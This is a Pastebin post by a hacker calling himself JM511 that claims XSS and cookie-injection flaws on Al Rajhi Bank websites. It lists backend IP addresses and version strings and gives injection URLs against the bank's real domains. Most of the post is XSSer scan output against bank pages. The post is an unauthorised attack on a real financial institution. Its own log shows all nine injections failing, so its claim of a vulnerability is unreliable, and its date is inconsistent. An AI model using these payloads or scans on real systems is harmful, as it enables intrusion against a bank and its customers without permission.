Advertisement
Islam-Hacker

Xss www.alrajhibank.com.sa By JM511

Oct 26th, 2012
568
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.69 KB | None | 0 0
  1. Xss Injection
  2. On : www.alrajhibank.com.sa
  3. مصرف الراجحي , ثغرة حقن الكوكيز
  4. By JM511 #www.twitter.com/JM511
  5. Follow me more information
  6. ========================================
  7. Greeting to :
  8. #in3ctor Q8 , #JiNnI-LB #Zombie_JM #Sec-Q8 #Dr.ExE #GolDen-Z3r0 #Sarbot511
  9. 2013/2/7
  10. -------------- SUU ------------------
  11. ========================================
  12. msg to n00bs: _!_
  13. Version
  14.  
  15. webapp : cui-sv_wls113.0_37_140912
  16. jsLibrary : WDS_JSLIBRARY_V54_050110
  17. tagLibrary : 1.0-24
  18. Backend : ETV-JEDSV08AA 194.76.166.179
  19. SI : 1ASIXJCPSV 194.76.166.67
  20. eRetail Engine :
  21.  
  22. http://www.alrajhibank.com.sa/ar/Pages/Alrajhi_results.aspx?k=1%27
  23. http://www.alrajhi-capital.com/ar/brokerage/echannels/Pages/%22%3EHacked%20by%20JM511
  24. http://www.alrajhibank.com.sa/en/pages/default.aspx%22%3EHacked%20by%20JM511
  25. http://career.alrajhibank.com.sa/%22%3EHacked%20by%20JM511
  26. http://www.alrajhibank.com.sa/en/media-centre/pages/events.aspx%22%3EHacked%20by%20JM511
  27. http://www.alrajhibank.com.sa/en/business/cash-management/pages/%22%3EHacked%20by%20jm511
  28.  
  29.  
  30. when u run ur fucker mind u wll c that :)
  31. i cut some of shit cuz n00bs ;)
  32. ===========================================================================
  33.  
  34. XSSer v1.6 (beta): "Grey Swarm!" - 2011/2012 - (GPLv3.0) -> by psy
  35.  
  36. ===========================================================================
  37. Testing [XSS from Dork] injections...good luck ;)
  38. ===========================================================================
  39. ===========================================================================
  40. Target: http://career.alrajhibank.com.sa/ --> 2012-10-27 05:52:29.660518
  41. ===========================================================================
  42.  
  43. ---------------------------------------------
  44. [-] Hashing: d8a66d4f2366f456ae5efc09e6a439ff
  45. [+] Trying: http://career.alrajhibank.com.sa/">d8a66d4f2366f456ae5efc09e6a439ff
  46. [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
  47. [-] Headers Results:
  48.  
  49. Server: nginx
  50. Date: Sat, 27 Oct 2012 02:52:38 GMT
  51. Connection: keep-alive
  52. Keep-Alive: timeout=5
  53. Pragma: no-cache
  54. Cache-Control: private, no-cache, no-cache="Set-Cookie", no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform
  55. Expires: Mon, 3 Jul 2000 15:55:03 GMT
  56. Set-Cookie: user-prefs=locale {} lang en; Path=/
  57. MIME-Version: 1.0
  58. Content-Length: 15
  59. http-code: 404
  60. total-time: 0.881931
  61. namelookup-time: 0.38018
  62. connect-time: 0.584797
  63. header-size: 438
  64. request-size: 294
  65. response-code: 404
  66. ssl-verifyresult: 0
  67. content-type: text/html; charset=utf-8
  68. cookielist: ['career.alrajhibank.com.sa\tFALSE\t/\tFALSE\t0\tuser-prefs\tlocale {} lang en']
  69.  
  70. ---------------------------------------------
  71. [-] Injection Results:
  72.  
  73. 404 Not Found: The server has not found anything matching the Request-URI
  74.  
  75. ===========================================================================
  76. Target: http://www.alrajhibank.com.sa/ar/pages/default.aspx --> 2012-10-27 05:52:29.660518
  77. ===========================================================================
  78.  
  79. ---------------------------------------------
  80. [-] Hashing: 3383787634ef2d85f8879939976aba0d
  81. [+] Trying: http://www.alrajhibank.com.sa/ar/pages/default.aspx/">3383787634ef2d85f8879939976aba0d
  82. [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
  83. [-] Headers Results:
  84.  
  85. Date: Sat, 27 Oct 2012 02:52:38 GMT
  86. Connection: close
  87. Content-Length: 34
  88. Set-Cookie: NSC_BmSbkijOfxQpsubm=ffffffffaf181d1e45525d5f4f58455e445a4a423660;path=/;httponly
  89. http-code: 400
  90. total-time: 0.265311
  91. namelookup-time: 0.186291
  92. connect-time: 0.223349
  93. header-size: 224
  94. request-size: 313
  95. response-code: 400
  96. ssl-verifyresult: 0
  97. content-type: text/html
  98. cookielist: ['#HttpOnly_www.alrajhibank.com.sa\tFALSE\t/\tFALSE\t0\tNSC_BmSbkijOfxQpsubm\tffffffffaf181d1e45525d5f4f58455e445a4a423660']
  99.  
  100. ---------------------------------------------
  101. [-] Injection Results:
  102.  
  103. 400 Bad Request: The request could not be understood by the server due to malformed syntax
  104.  
  105. ===========================================================================
  106. Target: http://www.alrajhibank.com.sa/en/pages/default.aspx --> 2012-10-27 05:52:29.660518
  107. ===========================================================================
  108.  
  109. ---------------------------------------------
  110. [-] Hashing: 59b614b559bfdea055561b402b977701
  111. [+] Trying: http://www.alrajhibank.com.sa/en/pages/default.aspx/">59b614b559bfdea055561b402b977701
  112. [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
  113. [-] Headers Results:
  114.  
  115. Date: Sat, 27 Oct 2012 02:52:39 GMT
  116. Connection: close
  117. Content-Length: 34
  118. Set-Cookie: NSC_BmSbkijOfxQpsubm=ffffffffaf181d1e45525d5f4f58455e445a4a423660;path=/;httponly
  119. http-code: 400
  120. total-time: 0.257742
  121. namelookup-time: 0.179871
  122. connect-time: 0.217707
  123. header-size: 224
  124. request-size: 313
  125. response-code: 400
  126. ssl-verifyresult: 0
  127. content-type: text/html
  128. cookielist: ['#HttpOnly_www.alrajhibank.com.sa\tFALSE\t/\tFALSE\t0\tNSC_BmSbkijOfxQpsubm\tffffffffaf181d1e45525d5f4f58455e445a4a423660']
  129.  
  130. ---------------------------------------------
  131. [-] Injection Results:
  132.  
  133. 400 Bad Request: The request could not be understood by the server due to malformed syntax
  134.  
  135. ===========================================================================
  136.  
  137. ===========================================================================
  138. Target: http://career.alrajhibank.com.sa/ar/ --> 2012-10-27 05:52:29.660518
  139. ===========================================================================
  140.  
  141. ---------------------------------------------
  142. [-] Hashing: 2317523b668150612031539414d1f1f2
  143. [+] Trying: http://career.alrajhibank.com.sa/ar/">2317523b668150612031539414d1f1f2
  144. [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
  145. [-] Headers Results:
  146.  
  147. Server: nginx
  148. Date: Sat, 27 Oct 2012 02:52:44 GMT
  149. Connection: keep-alive
  150. Keep-Alive: timeout=5
  151. Pragma: no-cache
  152. Cache-Control: private, no-cache, no-cache="Set-Cookie", no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform
  153. Expires: Mon, 3 Jul 2000 15:55:03 GMT
  154. Set-Cookie: user-prefs=locale {} lang en; Path=/
  155. MIME-Version: 1.0
  156. Content-Length: 15
  157. http-code: 404
  158. total-time: 0.771837
  159. namelookup-time: 0.270268
  160. connect-time: 0.475814
  161. header-size: 438
  162. request-size: 297
  163. response-code: 404
  164. ssl-verifyresult: 0
  165. content-type: text/html; charset=utf-8
  166. cookielist: ['career.alrajhibank.com.sa\tFALSE\t/\tFALSE\t0\tuser-prefs\tlocale {} lang en']
  167.  
  168. ---------------------------------------------
  169. [-] Injection Results:
  170. [+] Checking: url attack with ">PAYLOAD... fail
  171.  
  172. Searching hash: 363335a0b7f70b40eb322803bf3ad6b0 in target source code...
  173.  
  174. Injection failed!
  175.  
  176. ===========================================================================
  177. Target: http://www.app1.alrajhibank.com.sa/calculators/default.aspx?lang=ar/ --> 2012-10-27 05:52:29.660518
  178. ===========================================================================
  179.  
  180. ---------------------------------------------
  181. [-] Hashing: 7ad4f24ee8888fcbdd3dbfb905f6bcaf
  182. [+] Trying: http://www.app1.alrajhibank.com.sa/calculators/default.aspx?lang=ar/">7ad4f24ee8888fcbdd3dbfb905f6bcaf
  183. [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
  184. [-] Headers Results:
  185.  
  186. Connection: close
  187. Date: Sat, 27 Oct 2012 02:52:45 GMT
  188. Server: Microsoft-IIS/6.0
  189. X-Powered-By: ASP.NET
  190. X-AspNet-Version: 2.0.50727
  191. Location: /calculators/default.aspx?lang=ar/">7ad4f24ee8888fcbdd3dbfb905f6bcaf&AspxAutoDetectCookieSupport=1
  192. Set-Cookie: AspxAutoDetectCookieSupport=1; path=/
  193. Cache-Control: private
  194. Set-Cookie: NSC_BmSbkijOfxQpsubm=ffffffffaf181d0145525d5f4f58455e445a4a423660;path=/;httponly
  195. http-code: 302
  196. total-time: 0.317241
  197. namelookup-time: 0.238896
  198. connect-time: 0.275696
  199. header-size: 462
  200. request-size: 329
  201. response-code: 302
  202. ssl-verifyresult: 0
  203. content-type: text/html
  204. cookielist: ['www.app1.alrajhibank.com.sa\tFALSE\t/\tFALSE\t0\tAspxAutoDetectCookieSupport\t1', '#HttpOnly_www.app1.alrajhibank.com.sa\tFALSE\t/\tFALSE\t0\tNSC_BmSbkijOfxQpsubm\tffffffffaf181d0145525d5f4f58455e445a4a423660']
  205.  
  206. ---------------------------------------------
  207. [-] Injection Results:
  208. [+] Checking: url attack with ">PAYLOAD... fail
  209.  
  210. Searching hash: 7ad4f24ee8888fcbdd3dbfb905f6bcaf in target source code...
  211.  
  212. Injection failed!
  213.  
  214. ===========================================================================
  215. Target: https://eservice.alrajhibank.com.sa/AOW?Lang=AR --> 2012-10-27 05:52:29.660518
  216. ===========================================================================
  217.  
  218. ---------------------------------------------
  219. [-] Hashing: 6d818ea918ce8691bee997249a545680
  220. [+] Trying: https://eservice.alrajhibank.com.sa/AOW?Lang=AR/">6d818ea918ce8691bee997249a545680
  221. [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
  222. [-] Headers Results:
  223.  
  224. http-code: 500
  225. total-time: 0.642949
  226. namelookup-time: 0.147325
  227. connect-time: 0.182972
  228. header-size: 265
  229. request-size: 308
  230. response-code: 500
  231. ssl-verifyresult: 0
  232. content-type: text/html; charset=utf-8
  233. cookielist: []
  234.  
  235. ---------------------------------------------
  236. [-] Injection Results:
  237.  
  238. 500 Internal Server Error: The server encountered an unexpected condition which prevented it from fulfilling the request
  239.  
  240. Mosquito(s) landed!
  241.  
  242.  
  243. ===========================================================================
  244. [*] Final Results:
  245. ===========================================================================
  246.  
  247. - Injections: 9
  248. - Failed: 9
  249. - Sucessfull: 0
  250. - Accur: 0 %
  251.  
  252. ===========================================================================
  253.  
  254. ===========================================================================
  255. [*] Statistic:
  256. ===========================================================================
  257. --------------------------------------------------
  258. Test Time Duration: 0:00:20.604619
  259. --------------------------------------------------
  260. Total Connections: 19
  261. -------------------------
  262. 200-OK: 11 | 404: 5 | 503: 0 | Others: 3
  263. Connec: 57 %
  264. --------------------------------------------------
  265. Total Payloads: 9
  266. -------------------------
  267. Checker: 0 | Manual: 0 | Auto: 9 | DCP: 0 | DOM: 0 | Induced: 0 | XSR: 0 | XSA: 0 | COO: 0
  268. --------------------------------------------------
  269. Total Injections: 9
  270. -------------------------
  271. Failed: 9 | Sucessfull: 0
  272. Accur : 0 %
  273. -------------------------
  274. Total Discovered: 0
  275. -------------------------
  276. Checker: 0 | Manual: 0 | Auto: 0 | DCP: 0 | DOM: 0 | Induced: 0 | XSR: 0 | XSA: 0 | COO: 0
  277. --------------------------------------------------
  278. False positives: 0 | Vulnerables: 0
  279. -------------------------
  280. Mana: 0
  281. --------------------------------------------------
  282. [I] Could not find any vulnerability!. Try another combination or hack it -manually- :)
  283.  
  284. ===========================================================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement